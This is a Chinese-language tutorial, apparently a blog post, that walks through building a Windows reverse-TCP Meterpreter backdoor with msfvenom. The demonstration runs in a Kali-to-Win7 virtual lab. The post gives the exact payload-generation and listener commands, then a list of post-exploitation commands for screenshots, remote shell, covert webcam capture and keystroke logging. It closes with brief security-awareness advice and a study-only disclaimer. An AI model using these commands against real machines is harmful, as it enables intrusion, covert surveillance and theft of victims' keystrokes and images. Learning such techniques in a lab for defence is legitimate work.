Msfvenom简介
msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。(简而言之 :生成恶意软件的工具)
正向连接和反向连接
正向连接是受害主机监听一个端口,由控制主机主动去连接受害者主机的过程,适用于受害者主机具有公网ip的情况下。
反向连接是控制主机监听一个端口,由受害者主机主动去连接控制主机,适用于受害者主机出网或没有公网ip的情况。反向连接不受防火墙的限制。
(简而言之:正向连接就像你给对方打电话,也打得通。而反向连接就是,对方拉黑了你,你打不通,只能对方打你电话)
用msfvenom制作恶意软件,用反向连接方式渗透攻击演示
软件:Vmware Workstation 14
攻击机:Kali
靶机环境:Win7
工具:
msfvenom生成恶意软件工具
Metasploit 渗透框架,能获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具
1.打开kali,获取root权限
sudo su-kali
2.使用msfvenom生成恶意软件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.116.128 LPORT=6060 -f exe>666.exe
“LHOST=”后面填写的为使用kali的ip地址,“LPORT=”后面为端口名(可以随意指定一个后面要用),“exe>”后面填写的为软件名(可以随意取)。如图出现白字部分内容,且软件图样如图所示,则恶意软件生成成功。
3.启动Metasploit
msfconsole
然后就可以使用其中的模块了
4.Metasploit设置侦听
use exploit/multi/handler (加载模块)
set payload windows/meterpreter/reverse_tcp (设置payload)
set lhost 192.168.116.128 (设置kali的ip)
set lport 6060 (设置kali的端口lport=6060)
exploit (执行)
如图所示则设置完成
5.将生成的软件上传至win7并运行(先将软件粘贴到物理机再粘贴到win7)
如图所示则成功启动,接下来可使用meterpreter进行一系列后渗透攻击
6.后渗透攻击演示
截屏
screenshot
在此不过多演示
后渗透命令拓展
screenshot //桌面截图
shell //进入DOS系统,受害者win7的命令行
chcp 65001 //改变编码方式,改乱码
whoami //查看受害者当前用户及权限(Windows系统最高权限:system)
exit //从命令行退回meterpreter
webcam_list //检测摄像头设备
webcam_snap //拍照
webcam_stream //摄影,视频
ps //查看windows系统运行进程
migrate-P //进程的PID
keyscan_start //开始监听
keyscan_dump //获取监听
keyscan_stop //停止监听
网络安全意识防范
该方式可能出现在生活中的方方面面,例如街上有人送一些小玩偶小挂件小扇子之类让你微信扫个码,可能就是他人制作的恶意软件病毒木马(作者本人扫过,寄QAQ);例如夜深人静时在暗戳戳的小角落里的“无视风险”安装(对,没错,说的就是你),软件里就可能带着木马病毒;例如某些网站链接同样会带有木马病毒。
为了自身隐私安全着想,应:
1.不连接公共网络。连接公共网络会合黑客处于同一网段。
2.不随意点开链接。链接里自带木马病毒。
3.不随意下载应用软件。非官网下载可能他人已经提前捆绑了恶意程序。
4.不要为了小扇子小玩偶去路上扫码。
同时提高自我防范意识和警惕性,不贪小便宜,牢记天上不会掉馅饼只会掉陷阱。
**以上皆为作者拙见,仅做网络安全学习参考。 **